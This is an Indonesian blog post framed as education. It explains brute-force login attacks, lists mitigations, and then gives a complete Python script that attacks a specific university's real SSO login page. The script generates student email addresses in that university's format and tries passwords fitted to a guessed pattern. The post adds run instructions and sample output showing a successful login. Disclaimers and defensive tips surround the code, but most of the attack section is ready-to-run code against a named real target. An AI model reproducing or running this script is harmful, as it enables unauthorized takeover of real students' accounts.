Guys follow ig mimin Follow Instagram
Beranda
cyber
Hacking

H*ck Akun SSO dengan metode Bruteforce - Education Content



 Eyyow Guys kembali lagi dengan mimin. Kali ini minim sebagai member dari MERSI, @Merdeka Siber akan memberikan sedikit ilmu Cyber Security yaitu teknik Bruteforce. Nah Perlu diingat ini hanya konten edukasi sebagai pemahaman dan tidak untuk disalahgunakan ya. 

Penjelasan Brute Force

Brute force adalah teknik mencoba semua kemungkinan kombinasi username dan password hingga menemukan yang cocok. Ini adalah salah satu metode hacking paling dasar, tetapi sangat efektif jika sistem target tidak memiliki perlindungan seperti rate limiting, CAPTCHA, atau lockout setelah beberapa kali percobaan gagal.

Langkah Kerja Brute Force

  1. Mengumpulkan Informasi:

    • Mengetahui format username atau email (misal: 24051204***@mhs.unesa.ac.id).
    • Mengetahui pola password (misal: 5 karakter, format AAA11).

  2. Membuat Kombinasi:

    • Membuat daftar username berdasarkan informasi yang diketahui.
    • Membuat daftar password sesuai pola yang diberikan.

  3. Mengirim Request:

    • Menggunakan kombinasi username dan password untuk mencoba login ke sistem.

  4. Cek Respons Server:

    • Jika respons server menunjukkan login berhasil, kombinasi username dan password tersebut valid.


Kelebihan dan Kekurangan Brute Force

Kelebihan:

  • Sederhana: Tidak memerlukan teknik yang rumit.
  • Efektif: Dapat berhasil jika username/password mudah ditebak.

Kekurangan:

  • Lambat: Memerlukan waktu yang sangat lama untuk kombinasi besar.
  • Terdeteksi: Sistem modern memiliki proteksi seperti lockout atau CAPTCHA.
  • Tidak Etis: Ilegal jika dilakukan tanpa izin.

Mitigasi Brute Force

  • Gunakan Password yang Kuat: Kombinasi huruf, angka, dan simbol.
  • Rate Limiting: Membatasi jumlah percobaan login.
  • CAPTCHA: Memastikan login dilakukan oleh manusia.
  • Lockout Policy: Memblokir akun setelah beberapa percobaan gagal.

Nah setelah memahami konsep bruteforce, kita akan cus lanjut ke penjelasan tekniknya. Kamu perlu memahami teknik ini untuk kemanan akunmu ya. 

Struktur Kode

1. Import Library


import random
import string
import requests
  • random: Untuk membuat password acak.
  • string: Mempermudah akses ke huruf kapital dan angka.
  • requests: Mengirim HTTP request ke server login.

2. Email Generator


def generate_sso_emails():
    prefix = "24051204"
    domain = "@mhs.unesa.ac.id"
    
    for i in range(1, 1000):  # Angka urut 1-999
        yield f"{prefix}{i:03}{domain}"
  • Menghasilkan email dengan format:
    • 24051204001@mhs.unesa.ac.id
    • 24051204002@mhs.unesa.ac.id
    • ...
    • 24051204999@mhs.unesa.ac.id

3. Password Generator

python

def generate_random_passwords(count=100):
    for _ in range(count):
        letters = ''.join(random.choices(string.ascii_uppercase, k=3))
        digits = ''.join(random.choices(string.digits, k=2))
        yield letters + digits
  • Membuat password acak dengan format AAA11.
  • Contoh output:
    • KWH34
    • TXA67
    • ZQP12

4. Login Attempt


def attempt_login(email, password):
    url = "https://sso.unesa.ac.id/login"
    data = {
        "username": email,
        "password": password
    }
    
    try:
        response = requests.post(url, data=data)
        if response.status_code == 200 and "berhasil" in response.text.lower():
            print(f"[SUCCESS] Login berhasil: {email}:{password}")
            return True
        print(f"[FAILED] {email}:{password}")
    except Exception as e:
        print(f"[ERROR] Tidak dapat terhubung ke server: {e}")
    
    return False
  • Fungsi:
    • Mengirimkan POST request ke server login.
    • Mengecek apakah login berhasil berdasarkan respons server.

5. Brute Force Function


def brute_force_sso():
    for email in generate_sso_emails():
        for password in generate_random_passwords(count=100):
            if attempt_login(email, password):
                print(f"[SUCCESS] Akun ditemukan: {email} | Password: {password}")
                return
  • Loop 1: Mengambil email dari generator.
  • Loop 2: Mengambil password dari generator.
  • Break: Berhenti jika login berhasil.


Penggunaan

  1. Pastikan Python dan library requests sudah terinstal.
  2. Jalankan script menggunakan command:

    python brute_force_sso.py
  3. Tunggu hingga proses selesai atau menemukan akun yang berhasil login.

Contoh Output

[FAILED] 24051204001@mhs.unesa.ac.id:KWH34
[FAILED] 24051204001@mhs.unesa.ac.id:TXA67
[FAILED] 24051204001@mhs.unesa.ac.id:ZQP12
[SUCCESS] Login berhasil: 24051204002@mhs.unesa.ac.id | Password: KLM45

Catatan Penting

  • Script ini hanya boleh digunakan untuk pengujian keamanan dengan izin.
  • dengan Konten edukasi ini, dihimbau agar mahasiswa untuk menggunakan sandi yang rumit dan susah ditebak. dan pastikan mengaktifkan keamanan ganda ya... 
#cyber #Hacking #Security

Posting Komentar

Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.